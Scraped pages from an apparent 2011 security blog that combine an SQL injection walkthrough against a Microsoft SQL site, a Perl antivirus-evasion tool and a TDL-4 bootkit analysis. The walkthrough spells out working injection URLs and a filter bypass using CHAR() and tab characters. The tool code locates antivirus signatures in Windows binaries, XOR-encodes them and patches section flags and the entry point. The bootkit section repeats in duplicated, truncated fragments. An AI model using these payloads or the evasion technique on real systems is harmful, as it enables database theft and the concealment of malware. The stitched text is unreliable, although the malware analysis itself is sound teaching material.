DISCLAIMER: For Educational Purposes Only.
Level: Entry Level.
Introduction:
I do not want to reinvent the wheel, just that I did not find enough information (actually I did not find anything clear enough) when trying to bypass single quotes filters via CHAR() MSSQL function, so I decided to write my own steps here.
Scenario:
You found a SQL Injection in a web site, however you need to bypass some security controls and below are the steps taken.
Scope:
Applicable to Microsoft SQL 200x although the methodology works for every database.
Step 1: We found a SQL Error in the Web App by adding letters to a numeric field:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019danux
And therefore we got something like:
[SQLServer JDBC Driver][SQLServer]Incorrect syntax near 'danux'.
Every time you get a SQL error in the response, that means your input was executed successfully by the DB Engine and therefore that input field is injectable.
Then we confirm this by adding a SQL command like:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 having 1%3d1
And we get a Syntax error confirming our input is being executed as SQL commands:
[SQLServer JDBC Driver][SQLServer]Column 'db.dbo.table.field' is invalid in the HAVING clause because it is not contained in either an aggregate function or the GROUP BY clause.
NOTE: Every App is different so you will need to calculate your own injection string, in my case I do not need to add comments "--" at the end or single quotes (so far).
Step 2: Trying to get DB Engine and Version via (select @@version)
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select @@version)
And we noticed no response is returned!!!!
Escalation 1: Looks like there is some filter in the Server side that is not allowing us to get the information back, so a good trick is to get our information via a SQL Error message, commonly by trying to convert a string into an integer, so we will try to do that:
e.g. select char(@@version)
Whole URL:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 IN (select char(@@version))
The DB will try to convert the string into an integer which is not possible and therefore and error will be generated along with our information:
[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'Microsoft SQL Server 2005 - 9.00.5000.00 (X64) Dec 10 2010 10:38:40 Copyright (c) 1988-2005 Microsoft Corporation Standard Edition (64-bit) on Windows NT 6.0 (Build 6001: Service Pack 1) ' to data type int
From now on in this Pentest we know we will need to do this kind of conversions to get our required information.
Step 3: Lets try to get database names by injecting:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases)
And we get the default one "master" in the SQL error:
[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'master' to data type int.
Step 4: Now we can start searching for more databases so we do something like:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where NAME not like 'master')
BUT we noticed our single quotes are being escaped:
019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like ''master%'')
Escalation 2: We use CHAR() MSSQL Function to avoid using single quotes so we inject something like:
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2bchar(37)
char(116) = m
%2b = +
char(37) = %
result = name not like CHAR(116)+CHAR(37)
Or in human readable syntax: name not like 'm%'
But when we inject it, we do not get a response again which means a filter in the Server side is detecting this attempts, so here is where your mind need to start thinking how to bypass filters, after some minutes I decided to break the pattern by adding a horizontal tab (ASCII 09 decimal) along with the space: char(109)%2b%09char(37):
http://site.com?method=returnSt&zipcode=44444&city=&state=&ratio=019 or 1 in (SELECT top 1 NAME FROM master..sysdatabases where name not like char(109)%2b%09char(37))
And guess what:
[SQLServer JDBC Driver][SQLServer]Conversion failed when converting the nvarchar value 'tempdb' to data type int.
We got the second default DB which means Game Over! we can dump the whole database and if we are lucky we could escalate it and get a remote shell (out of scope of this article).
We could start getting more data base names by discarding the ones we already got, something like:
where name not like 'master' and name not like 'tempdb' and name not like ..... using above instructions.
The next immediate step would be to start listing the tables from the DB and then the fields from those tables like:
SELECT name FROM syscolumns WHERE id = (SELECT id FROM sysobjects WHERE name = 'mytable');
Well known references:
1. http://pentestmonkey.net/cheat-sheet/sql-injection/mssql-sql-injection-cheat-sheet
2. http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
Hope this helps.
In this blog, we will learn Security together by sharing knowledge. Viva Mexico!
Thursday, August 18, 2011
Monday, July 4, 2011
AV Bypassing Basics- 101 Approach Series
DISCLAIMER: For Educational Purpose only. The author is not responsible for any misuse of the information.
INTRODUCTION:
Many different posts have explained the basics to bypass a signature-based AV and therefore I will not explain the same stuff but to come up with a tool that can be used as a framework to keep bypassing the AVs by updating the encoding function with little effort.
SCOPE:
The tool was tested against AVG 7.5 and only works with Windows PE 32 bits binaries.
RESOURCES:
- Code Breakers Magazine: Portable Executable File Format - A Reverse Engineer View.
- This tool is inspired in the presentation give my Mati Aharoni at Shmoocon: http://www.youtube.com/watch?v=kwq5VQj3Ils
- Taking back netcat: http://dl.packetstormsecurity.net/papers/virus/Taking_Back_Netcat.pdf
TOOL NAME: Regalado-AV.pl
TOOL DESCRIPTION:
The tool will read a malicious file, then will play with the AV to locate the malicious signature within the binary, then will encode the signature and finally will insert the decoder function to decode the signature in memory.
MAIN FEATURES OF THE TOOL:
- PE Parsing: The tool loads the PE Binary in memory and extracts important data like PE Header, Data Directory, Section Table and PE File sections.
- Able to locate the "malicious bytes" (signature) being caught by the AV. Each AV has its own signatures to detect malicious files, once we detect the exact location within the binary, the next step is to encode them so that the AV does not see them anymore.
- Insert Code Cave: The tool will redirect the entry point to the encoder/decoder function which will encode the signature being detected.
- Section patching on the fly: The section where the signature is located must be set as "writeable" so that it can be overwritten on memory.
- Opcode creation on the fly: The tool is able to create CALLs and JUMPs instructions calculating the relative address on the fly, and adjusting from RAW to VIRTUAL address as well.
Below is the code to get all the properties from PE Binary:
sub get_PE_structure(){
my @cop = @_;
# bytes 60 - 63 holds the PE Header offset address
$PE{"pe_off_addr"} = hex($cop[63] . $cop[62] . $cop[61] . $cop[60]);
print " PE Offset Address=>" . $PE{"pe_off_addr"} . "\n"; # En decimal
my $pe_off = $PE{"pe_off_addr"};
$PE{"pe_header_off"} = $cop[$pe_off] . $cop[$pe_off + 1];
#Validating we got the PE Header which starts with 50 45 = PE
if ($PE{"pe_header_off"} eq "5045"){
print " PE Header Prefix =>" . $PE{"pe_header_off"} . "\n";
}
else{
print " PE Header Offset NOT FOUND\n";
}
#[80h + 6h] = #NumberOfSections -> 6 bytes after offset of PE Header defined above.
$PE{"NumberOfSections"} = $cop[$PE{"pe_off_addr"} + 6];
print " PE Number of Sections=>" . $PE{"NumberOfSections"} . "\n";
#[80h + 28h] = #Virtual AddressOfEntryPoint -> 28h = 40d
$PE{"AddressOfEntryPoint"} = $cop[$pe_off + 43] . $cop[$pe_off + 42] . $cop[$pe_off + 41] . $cop[$pe_off + 40];
print " PE AddressOfEntryPoint=>" . $PE{"AddressOfEntryPoint"} . "\n";
#[80h + 2Ch] = #Virtual BaseOfCode -> 2Ch = 44d
#BaseOfCode = RVA of first byte of code when loaded into RAM
$PE{"BaseOfCode"} = $cop[$pe_off + 47] . $cop[$pe_off + 46] . $cop[$pe_off + 45] . $cop[$pe_off + 44];
print " PE BaseOfCode=>" . $PE{"BaseOfCode"} . "\n";
#[80h + 34h] = #ImageBase -> 34h = 52d
$PE{"ImageBase"} = $cop[$pe_off + 55] . $cop[$pe_off + 54] . $cop[$pe_off + 53] . $cop[$pe_off + 52];
print " PE ImageBase=>" . $PE{"ImageBase"} . "\n";
#Calculating the distance from the start of Code section to the Entry Point, this will be used to calculate the Raw Offset of Entry Point
my $diff = hex($PE{"AddressOfEntryPoint"}) - hex($PE{"BaseOfCode"});
#print " Entry point is $diff (dec) bytes away from the start of code section\n";
#Sections related data, not part of PE Structure but each section
#[80h + F8h] = #START OF SECTION TABLE - PE Offset + F8h (248d) = 178h start of .text section
$sec_off = $pe_off + 248;
for (my $i =1; $i <= $PE{"NumberOfSections"}; $i++){
#[80h + F8h] = #START OF SECTION TABLE - PE Offset + F8h (248d) = 178h start of .text section
#[178] = #Offset of .text section
#[178] = #Section name - 8 bytes
$sec_name = sprintf("%c%c%c%c%c%c%c%c", hex($cop[$sec_off]) , hex($cop[$sec_off + 1]) , hex($cop[$sec_off + 2]) , hex($cop[$sec_off + 3]) ,
hex($cop[$sec_off + 4]) , hex($cop[$sec_off + 5]) , hex($cop[$sec_off + 6]) , hex($cop[$sec_off + 7]));
$sec_name =~ s/^(\.[a-zA-Z]+).+/$1/;
print " Section Name=>" . $sec_name . "<<\n";
$SEC{$i}{"name"} = $sec_name;
$SEC{$i}{"offset"} = $sec_off;
#print " Section Offset=>" . $SEC{$i}{"offset"} . "\n";
#[178h + 0c] = #Virtual Address - Size of data on disk - 4 bytes - + 0c h = 12d
$SEC{$i}{"VirtualAddress"} = $cop[$sec_off + 15] . $cop[$sec_off + 14] . $cop[$sec_off + 13] . $cop[$sec_off + 12];
print " VirtualAddress=>" . $SEC{$i}{"VirtualAddress"} . "\n";
#[178h + 10h] = #SizeOfRawData - Size of data on disk - 4 bytes
$SEC{$i}{"SizeOfRawData"} = $cop[$sec_off + 19] . $cop[$sec_off + 18] . $cop[$sec_off + 17] . $cop[$sec_off + 16];
print " SizeOfRawData=>" . $SEC{$i}{"SizeOfRawData"} . "\n";
#[178h + 14h] = #PointerToRawData - Raw Offset of section on disk - could be zero, if not, take it without extra calc, otherwise extra calc.
$SEC{$i}{"PointerToRawData"} = $cop[$sec_off + 23] . $cop[$sec_off + 22] . $cop[$sec_off + 21] . $cop[$sec_off + 20];
print " PointerToRawData=>" . $SEC{$i}{"PointerToRawData"} . "\n";
if ($i == 1){
#Saving ONLY offset of first section which will be the offset to start obfuscating the file
$firstOffset = hex($SEC{$i}{"PointerToRawData"});
#Calculating the Raw offset of Entry Point based on Virtual AddressOfEntryPoint
$rawEntryPoint = $firstOffset + $diff;
print " Raw Entry Point: $rawEntryPoint\n";
}
#[178h + 24h] = #Characteristics - DWORD = 4 bytes - Defines the permissions of the file when loaded in Memory
#Flags => 20000000 - section is executable
# 40000000 - section is readable
# 80000000 - section is writable - Si valor del flag es menor a 80000000 entonces no es writable y hay que sumarle esta cantidad.
# e.g. .rdata flag = 40000040 no writable. Making it writable will require to add 80000000 to current value so final flag would be = C0000040
# 40000040 + 80000000 = C0000040
$SEC{$i}{"flag"} = $cop[$sec_off + 39] . $cop[$sec_off + 38] . $cop[$sec_off + 37] . $cop[$sec_off + 36];
print " Flag=>" . $SEC{$i}{"flag"} . "\n";
#Pass current flag of section and the array containing the raw file, this when calling the function
#Now, lets move on to the next section offset which is 28h = 40d bytes further
$sec_off += 40;
}#End of For loop
}
Locating the malicious signature within the binary:
The idea was taken from the document "Taking back Netcat", with little changes, basically the steps performed by the tool are shown below:
- The binary will be splitted into two parts: part1 and part2.
- Part 1 is filled out with zeros.
- The AV scan is run against the binary.
- If a virus is detected by the scan, it means the signature is located in part2 (since part1 contains only zeros). Then, part2 is divided into part1 and part2 and go to point 3.
- If a virus is NOT detected by the scan, then the virus is located in part1. Then part1 is divided into part1 and part2 and go to point 3.
- Loop from point 3 to 5 is repeated until no more bytes left to analyzed or until the AV does not detect the virus anymore in part1 and part2.
sub get_signature(){
my ($parte, $off, $end, @cop) = @_;
my $chunk = "";
my $div = "";
my $mod = "";
if ($parte eq "p1") { #Divide en 2 partes y utiliza la primera - p1
$chunk = $end - $off;
$div = $off + ($chunk / 2);
$mod = $chunk % 2;
if ($mod == 1) {
$div = ceil($div);
#print "Redondeo: $div\n";
}
}
elsif ($parte eq "p2"){#No divide solo ofusca la parte 2
$div = $end;
}
print "\n" . $off . " < -- > ". $div . "\n";
#Siempre habre solo 2 partes del archivo: Parte 1 y Parte 2
#for my $n ($offset .. $div){#Llenamos Parte 1 de ceros
my $cont = 0;
for my $n ($off .. $div){#Llenamos Parte 1 de ceros
$cop[$n] = sprintf("%02x", "00");
$cont += 1;
}
print "Bytes obfuscated: " . $cont . "\n";
write_file(@cop); #Write file to be scanned by AV
ask_user(); #Asl end user whether virus found
if ($ans eq "y") { #Virus Found then signature is located in the Parte 2
$c_found +=1;
if ($c_found == 2){
#check if a previous good obfuscation of signature was detected
if ($sig_ini > 0){
print "\n\t***** Signature FOUND *******\n";
#print "\t" . $sig_ini . " < -- > ". $sig_end . "\n";
get_section();
get_signatureVA();#Calculate Vitual offset of signature to use it within decoder routine
print "\tSignature Address range: " . $vsig_ini . " < -- > ". $vsig_end . "\n\n";
}
else{
print "\n\t***** Oooops :-( ... Signature NOT FOUND *******\n";
exit(0);
}
}
else{
get_signature("p2", $div + 1, $end, @copia);
}
}
elsif ($ans eq "n") {#Signature located at Parte 1
$c_found =0;
$sig_ini = $off;
$sig_end = $div;
#Before searching again for the signature, we make sure the signature is not less than 1 byte, if so, no more iteractions
if ( ($div - $off <= 1) ){
print "\n\t***** Signature FOUND ***********\n" ;
get_section();
get_signatureVA();#Calculate Vitual offset of signature to use it within decoder routine
print "\tSignature Address Range: " . $vsig_ini . " < -- > ". $vsig_end . "\n\n";
}
else{
get_signature("p1", $off, $div, @copia);
}
}
}
You can see how this works by watching the video mentioned at the end of this article.
Inserting Code Cave:
- The tool searches for enough space (35 bytes) within the text section to insert our decoder. TODO: The tool should be able to search in every section or even to create a new one if not enough space found.
- The tool redirect the Entry Point by inserting a CALL instruction to jump into the space found at point 1. The tool assumes the entry point contains a 5-opcode instruction and therefore able to replace it with a CALL instruction which is also 5 bytes. The tool supports the option to change this assumption with the "-o" option.
- The signature found is encoded with a XOR encryption key.
- A basic XOR decoder is inserted with a random encryption key, which is calculated every time the program runs.
- The new file is stored in the filesystem.
One the the main features that personally loved to implement was to be able to make the section writeable if need.
Every section (text, data, resources, so on) within a PE file contains a DWORD member called "Characteristics" which contains flags to indicate whether the file is executable or the permissions of the file on memory. In our case, we need to make sure, the section is "Writeable" on memory so that we can change the signature (which was encoded at rest) on memory.
The calculation took me time to understand it but the formula is so simple. The tool gets the DWORD bytes of the characteristics member within the section where the signature was found and then if the value is less than 0x80000000 it means the section is NOT writeable on memory and therefore the hex value 0x80000000 is added to the current flag.
The code is shown below:
sub set_flag(){
my $i = shift @_;
#@copia = @main;
#Si el valor del flag es < 80000000 entonces no es writable y por lo tanto se le suma al valor 80000000. Y si es >= 80000000 entonces es writable y no se hace nada.
if ( hex($SEC{$i}{"flag"}) < hex("80000000") ) {
print ("\tThe section is not writable! so patching the section.\n");
my $w_byte = sprintf("%x", hex($SEC{$i}{"flag"}) + hex("80000000") ) ;
#print " New writable Flag=>" . $w_byte . "\n";
#Patching the binary in little endian.
$copia[$SEC{$i}{"offset"} + 36] = substr $w_byte, 6,2;
$copia[$SEC{$i}{"offset"} + 37] = substr $w_byte, 4,2;
$copia[$SEC{$i}{"offset"} + 38] = substr $w_byte, 2,2;
$copia[$SEC{$i}{"offset"} + 39] = substr $w_byte, 0,2;
#Escribimos nuevo binario parchado
#write_file(@copia);
}
else{
print ("\tThe section is writable so we are good to go!\n");
}
}
TODO:
- Able to insert new encoders to bypass latest AVs.
- Able to create new sections if needed.
- Able to encode the Metasploit encoders.
IMPORTANT:
Se how the tool works here:
If interested in the source code, send me an email to danuxx@gmail.com.
Please share new ideas to implement new encoders in the tool.
Tuesday, March 15, 2011
TDSS:TDL-4 - Bootkit - 101 Approach - Part 1
DISCLAIMER: First off, all the information found here is for EDUCATIONAL PURPOSE ONLY. The author is not responsible for any misuse.
IMPORTANT: The intent of my posts is to share knowledge and grow together, so if you find something that you think is inaccurate, feel free to let me know and together we can prepare a better document and learn together. I am not a Hacker, Cracker or something similar, just a hot-blooded Security guy who wants to learn and share. So, if you want to start criticizing without proposing anything, I will just ignore those comments.
Audience: Not for Junior/Senior Malware Analyst but for starters.
Acknowledgments: I want to thank Phil Fuhrer who realized we were dealing with TDL-4 and who found the ROR procedure to encode part of MBR code.
In this Part 1, I will analyze only the bookit portion of the Malware.
Master Boot Record Infection (MBR):
As mentioned by Kaspersky, this new variant infects the MBR, and here is the first "gray area" that need more explanation. In order to understand how the MBR is infected, you first must understand how MBR works. An Examination of the Standard MBR is an old but excellent article where you can understand the way MBR works as well as the assembly code associated.
When a BIOS-based (Basic Input Output System) computer boots, the first code it executes is called the BIOS, which is encoded into the computer's ROM. The BIOS selects a boot device, reads the device' MBR into memory (see point 3 below), and transfers control to the code in the MBR.
For the purpose of this analysis, these are the key points to keep in mind about MBR:
Analyzing MBR code:
Get the first 512 bytes of the infected hard drive and open it with IDA Pro by choosing:
Varios Files-> Binary/Raw File option
And very important, when IDA Pro asks "Do you want to disassemble it as 32 bit code?"
Click "NO" since MBR code is 16 bit syntax (bp instead of ebp, sp instead of esp, so on).
Another point to consider, once the code is loaded into IDA, go to the first assembly instruction and hit letter "C" (to set the Entry Point) so that IDA can analyze the code and create the proper assembly operands, otherwise you will see cod e that make s no sense. This needs to be done every time you need IDA to interpret a piece of code being analyzed.
The image below shows the extract of the first instructions of MBR via IDA Pro. By reviewing these lines of code, we realized, the bootkit did not change its initial behavior.
What this code does is to copy MBR code itself from memory location 7c00h to 600h. This is done since later on MBR code will load the Boot Sector of the Active Partition in to the same area of memory (7C00h) that it was first loaded into.
Basically, the code uses movsb instruction to move one single byte at a time, from SI = 7C00h to DI= 600h, so in order to move 512 bytes, CX register is used as the counter 200h=512d and the REP (repeat) instruction to loop and copy the whole sector into the new location.
Decrypting MBR code:
By looking at the next instructions within the MBR sector, we confirmed the bootkit was using a basic ROR (Rotate right) method to obfuscate/encrypt some code as explained by Kaspersky blog, so let's analyze how this obfuscation works and the address space affected. Below is the chunk of code that implements the encryption process:
Before starting our analysis, make a note of the instructions started at offset 2A, those are currently encrypted, you will see the difference below once those are decrypted, so far, those instructions make no sense, right?
001E: CX is set to 132h, this number contains the chunk siz e of memory to be decrypted and the key used for decryption. I will explain this in detail below.
0021: BP is set to 62Ah, this is the offset in memory where the ROR will start decrypting the data. If you remember, MBR copied itself to 600h which means, 2A bytes below is where the encrypted code is located which is right after the loop instruction.
0024: ROR instruction will be executed ag ainst the data located at 62Ah with the key located at CL register, in the first loop it will be 32. Next loop will decrypt data at 62Ah + 1 with CL=31 and so on.
0028: Loop until CL becomes 0 and therefore the loop ends (loop instruction decrements CX by default).
*NOTE: In order to avoid "Pattern recognition", Malware creators change the registers and or keys of the malicious code. If you compare the decryption routine described by Kaspersky guys and mine you will notice one change, the decryption key/size is different:
Kaspersky = CX = 137 h
Mine = CX = 132h With this small change, all the encrypted code l ooks totally different.
You could try to decrypt the whole chunk by applying the ROR in every single byte that is tedious and prone to errors so I took the opportunity and created a simple Perl script (Regalado-ROR.pl) to do the ROR decryption for us.
Basically what my script expects as parameters are:
Regalado-ROR.pl will create and output file called "testiculo.bin" (don't ask me what this means in Spanish LoL) with the chunk of code decrypted, then you can open this file via IDA Pro to keep analyzing further instructions.
So, the way I executed the script was:
./Regalado-ROR.pl -f MBR-dump.raw -k 132 -o 2A
Outputfile = testiculo.bin
The image below shows the new raw file created by Regalado-ROR.pl with the decrypted instructions started at offset 2A which NOW makes more sense, you can start seeing "int 13h" (explain letter) and the ldr16 string mentioned by Kaspersky, so that means we are heading to the right direction!!
The Regalado-ROR.pl script is shown below, for you to use it in new variants of TDL-4.
#!/usr/bin/perl
#Regalado-ROR.pl implementation to unencrypt MBR
#Author: Daniel Regalado aka Danux Mitnick from Neza to the World!!!!
#Email: danuxx at gmail.com#Date: 03/11/2011 - 3:36 AM
use Getopt::Std;
getopts('f:k:o:',\%args);
if (!defined ($args{'k'}) or !defined ($args{'f'}) or !defined ($args{'o'}) ){
print "\n\tUsage: Regalado-ROR.pl -f -k -o \n" ;
exit(0);
}
my @main; #Array which contains the raw encrypted chunk
my $file = $args{'f'};
load_file(); #Let's load the raw file into @main array.
my @dec = @main; #Array which contains the raw decoded chunk
my $key = hex($args{'k'});
my $off = hex($args{'o'});
my $i =0;
for (1 .. $key){
#obteniendo solo los primeros 8 bits de la llave
my $cl = $key & 0b11111111;
#print "CL => $cl \n";
$key --;
#print "Raw byte=> $main[$off] \n";
$dec[$off] = &ror(hex($main[$off]), $cl) ;
$off++;
}
write_file(@dec); #Write decoded chunk to be analyzed by IDA Pro
sub ror {
# Usage: &ror(number, n)
# Rotate 'number' by 'n' bits right
my $number = shift;
my $bits2rotate = shift;
for (1..$bits2rotate) {
# Get right-most bit
my $rmb = $number & 0b00000001;
#print "rmb = $rmb\n";
# Shift right 1 bit
$number = $number >> 1;
#print "number = $number\n";
# Set left-most bit if the right-most bit of the number was == 1
if ($rmb == 1) {
$number = $number | 0b10000000;
}
}
return sprintf("%02x",$number);
}
#Imprime el arreglo que contiene el raw file en el file system.
#Param 1: Arreglo que contiene el raw file
sub write_file(){
my @final = @_;
open (FILE2,">testiculo.bin") or die $!;
binmode(FILE2);
for my $n (0 .. $#final){
print FILE2 sprintf("%c", hex($final[$n]) );
}
close (FILE2);
}
sub load_file(){
open(FILE, "<$file") or die $!;
binmode(FILE);
undef($main);
my $char = "";
my $i =0;
while (1) {
$char = getc(FILE);
$main[$i] = sprintf("%02x", ord($char));
if (eof(FILE)){
$fin = $i;#Saving the length of the file.
last;
}
$i +=1;
}
close(FILE);
}
#END of Script
Understanding decrypted code:
Next step is to understand what the decrypted code is going to do, as per Kasperky blog: "The main function of the MBR loader, which is small in size, is to search the rootkit’s encrypted partition for the ldr16 component, load it into RAM and pass control to it."
But again, let's analyze this "gray area" since there are many internal steps before taking above conclusion.
The main feature to understand here is the interruption 13h or INT 13 which basically uses different functions to read, write, lock, unlock, eject, etc, hard disks and removable media. There are two types of int 13h: 1. The legacy INT 13
Which means, the data is being loaded at offset 88Dh in the memory space.
Something to keep in mind is that the LBA address found at memory was 09502F59 and the last sector is 09502F90, this could be the range copied (backwards) from disk to memory, we will confirm this later. Quick tip-Getting sectors with dd tool:
dd if=/dev/sdb bs=512 skip=156249944 count = 2 >out Where 156249944d = 09502F59h the block detected in memory
Decrypt the sector loaded (via XOR function)
Once the encrypted sectors has been loaded in memory, the funny part begins, which is the code related to the decryption process as shown below:
00C4: The code will zero out all the bytes starting at offset 75D and until 85C, why only FFh (255 bytes)? because the loop is calculated based on BL register which is 8-bytes length and therefore after FFh the next value is 100 (BH=01 , BL=00) which sets bl to 0 and the loop ends. From 00CC to 00ED the same range (75D - 85C) is set with different values based on multiple calculations.
Decryption loop:
In the first two instructions of below code we can see that since the last byte affected by previous code (see above) was at offset 85C, now, the next byte to be change is at offset 85D and then 85E, this shows how the bootkit is preparing the proper bytes to be used during decryption process.
The decryption loop starts at offset 0109, some calculations are performed to calculate the encryption key, which is going to be stored at register CL, and finally at instruction 012B the XOR function is executed against the content where SI is pointing to which is (see above) the offset 88D where the first byte from disk was loaded. A sector of 512 bytes is going to be decrypted as expected, we can confirm this by checking the value of register DX which is the counter of this loop and is set to 200h (512 bytes) at the instruction 00FA.
Jumping to the decrypted code in Memory
Once all the sectors loaded from disk have been decrypted in memory, it is time to jump to the new instructions. In the code below we can see two important things:
1. 060 - 067: Decrypted code is being moved from SI (893h) to DI (calculated at runtime) CX number of times. Here is where decrypted code is being loaded into memory, this step happens every time one sector has been decrypted.
2. 069 - 071: The value at offset 891h in memory will call the decryption function if more sectors need to be decrypted, otherwise will jump to the decrypted code in memory.
Next Steps
The next step will be to create a perl script to decrypt the hard disk sectors and come up with the next set of instructions. Specifically, we will be analyzing how the INT 13 Hooking is being implemented!!!! and how the malicious kernel-level drivers are loaded before the OS starts.
Currently I am swamped with other stuff but I will try to dedicate some hours in the near future. Meanwhile, please share any thoughts.
Thanks.
IMPORTANT: The intent of my posts is to share knowledge and grow together, so if you find something that you think is inaccurate, feel free to let me know and together we can prepare a better document and learn together. I am not a Hacker, Cracker or something similar, just a hot-blooded Security guy who wants to learn and share. So, if you want to start criticizing without proposing anything, I will just ignore those comments.
Audience: Not for Junior/Senior Malware Analyst but for starters.
Acknowledgments: I want to thank Phil Fuhrer who realized we were dealing with TDL-4 and who found the ROR procedure to encode part of MBR code.
Goal:
Personally, every time I read a blog from AV guys, it is hard to understand since it is too technical, which is good for those who are working on a daily basis on Malware Analysis-related efforts, but what about the community who wants to start in this field? They will need to know the step-by-step process to start entering into this area and most important to got interest. That is the idea of these "101 Approach" Series... to learn from scratch!!!
Introduction:
I started analyzing the rootkit/bootkit known as TDSS. TDL-4, at the beginning I did not have any idea about the behavior of this threat so we start gathering information from the community and I end up with an excellent article from Kaspersky explaining this new variant. When I started analyzing the aforementioned article, I realized the writers just got to the point (as expected) and skip too many details of the analysis.
The intent of this "101 Approach" series, is to document the "gray areas" not described in those technical articles, as well as mention the new variants with the Malware I got in my Lab so that, if you are a beginner in this field and not a technical guru, you still will be able to understand/follow the internals of this bootkit.
Scope:
Personally, every time I read a blog from AV guys, it is hard to understand since it is too technical, which is good for those who are working on a daily basis on Malware Analysis-related efforts, but what about the community who wants to start in this field? They will need to know the step-by-step process to start entering into this area and most important to got interest. That is the idea of these "101 Approach" Series... to learn from scratch!!!
Introduction:
I started analyzing the rootkit/bootkit known as TDSS. TDL-4, at the beginning I did not have any idea about the behavior of this threat so we start gathering information from the community and I end up with an excellent article from Kaspersky explaining this new variant. When I started analyzing the aforementioned article, I realized the writers just got to the point (as expected) and skip too many details of the analysis.
The intent of this "101 Approach" series, is to document the "gray areas" not described in those technical articles, as well as mention the new variants with the Malware I got in my Lab so that, if you are a beginner in this field and not a technical guru, you still will be able to understand/follow the internals of this bootkit.
Scope:
In this Part 1, I will analyze only the bookit portion of the Malware.
Master Boot Record Infection (MBR):
As mentioned by Kaspersky, this new variant infects the MBR, and here is the first "gray area" that need more explanation. In order to understand how the MBR is infected, you first must understand how MBR works. An Examination of the Standard MBR is an old but excellent article where you can understand the way MBR works as well as the assembly code associated.
When a BIOS-based (Basic Input Output System) computer boots, the first code it executes is called the BIOS, which is encoded into the computer's ROM. The BIOS selects a boot device, reads the device' MBR into memory (see point 3 below), and transfers control to the code in the MBR.
For the purpose of this analysis, these are the key points to keep in mind about MBR:
The MBR is assembly code stored at the first sector of the hard disk (offset 0000). A sector contains 512 bytes and therefore this is the size of MBR code . MBR is used to load the active partition which contains the boot ins tructions to load the Operating System. The BIOS will load the MBR block (512 bytes) into memory at offset 7C00. The BIOS transfers execution to MBR after loading it into memory.
Analyzing MBR code:
Varios Files-> Binary/Raw File option
And very important, when IDA Pro asks "Do you want to disassemble it as 32 bit code?"
Click "NO" since MBR code is 16 bit syntax (bp instead of ebp, sp instead of esp, so on).
Another point to consider, once the code is loaded into IDA, go to the first assembly instruction and hit letter "C" (to set the Entry Point) so that IDA can analyze the code and create the proper assembly operands, otherwise you will see cod
The image below shows the extract
What this code does is to copy MBR code itself from memory location 7c00h to 600h. This is done since later on MBR code will load the Boot Sector of the Active Partition in to the same area of memory (7C00h) that it was first loaded into.
Basically, the code uses movsb instruction to move one single byte at a time, from SI = 7C00h to DI= 600h, so in order to move 512 bytes, CX register is used as the counter 200h=512d and the REP (repeat) instruction to loop and copy the whole sector into the new location.
Decrypting MBR code:
By looking at the next instructions within the MBR sector, we confirmed the bootkit was using a basic ROR (Rotate right) method to obfuscate/encrypt some code as explained by Kaspersky blog, so let's analyze how this obfuscation works and the address space affected. Below is the chunk of code that implements the encryption process:
Before starting our analysis, make a note of the instructions started at offset 2A, those are currently encrypted, you will see the difference below once those are decrypted, so far, those instructions make no sense, right?
0021: BP is set to 62Ah, this is the offset in memory where the ROR will start decrypting the data. If you remember, MBR copied itself to 600h which means, 2A bytes below is where the encrypted code is located which is right after the loop instruction.
0024: ROR instruction will be executed ag
0028: Loop until CL becomes 0 and therefore the loop ends (loop instruction decrements CX by default).
*NOTE: In order to avoid "Pattern recognition", Malware creators change the registers and or keys of the malicious code. If you compare the decryption routine described by Kaspersky guys and mine you will notice one change, the decryption key/size is different:
Kaspersky = CX = 137 h
Mine = CX = 132h
You could try to decrypt the whole chunk by applying the ROR in every single byte that is tedious and prone to errors so I took the opportunity and created a simple Perl script (Regalado-ROR.pl) to do the ROR decryption for us.
Basically what my script expects as parameters are:
The image/raw file being analyzed The CX value (in this case 132h) The BP value (offset to start decrypting).
Regalado-ROR.pl will create and output file called "testiculo.bin" (don't ask me what this means in Spanish LoL) with the chunk of code decrypted, then you can open this file via IDA Pro to keep analyzing further instructions.
So, the way I executed the script was:
./Regalado-ROR.pl -f MBR-dump.raw -k 132 -o 2A
Outputfile = testiculo.bin
The image below shows the new raw file created by Regalado-ROR.pl with the decrypted instructions started at offset 2A which NOW makes more sense, you can start seeing "int 13h" (explain letter) and the ldr16 string mentioned by Kasp
The Regalado-ROR.pl script is shown below, for you to use it in new variants of TDL-4.
#!/usr/bin/perl
#Regalado-ROR.pl implementation to unencrypt MBR
#Author: Daniel Regalado aka Danux Mitnick from Neza to the World!!!!
#Email: danuxx at gmail.com#Date: 03/11/2011 - 3:36 AM
use Getopt::Std;
getopts('f:k:o:',\%args);
if (!defined ($args{'k'}) or !defined ($args{'f'}) or !defined ($args{'o'}) ){
print "\n\tUsage: Regalado-ROR.pl -f
exit(0);
}
my @main; #Array which contains the raw encrypted chunk
my $file = $args{'f'};
load_file(); #Let's load the raw file into @main array.
my @dec = @main; #Array which contains the raw decoded chunk
my $key = hex($args{'k'});
my $off = hex($args{'o'});
my $i =0;
for (1 .. $key){
#obteniendo solo los primeros 8 bits de la llave
my $cl = $key & 0b11111111;
#print "CL => $cl \n";
$key --;
#print "Raw byte=> $main[$off] \n";
$dec[$off] = &ror(hex($main[$off]), $cl) ;
$off++;
}
write_file(@dec); #Write decoded chunk to be analyzed by IDA Pro
sub ror {
# Usage: &ror(number, n)
# Rotate 'number' by 'n' bits right
my $number = shift;
my $bits2rotate = shift;
for (1..$bits2rotate) {
# Get right-most bit
my $rmb = $number & 0b00000001;
#print "rmb = $rmb\n";
# Shift right 1 bit
$number = $number >> 1;
#print "number = $number\n";
# Set left-most bit if the right-most bit of the number was == 1
if ($rmb == 1) {
$number = $number | 0b10000000;
}
}
return sprintf("%02x",$number);
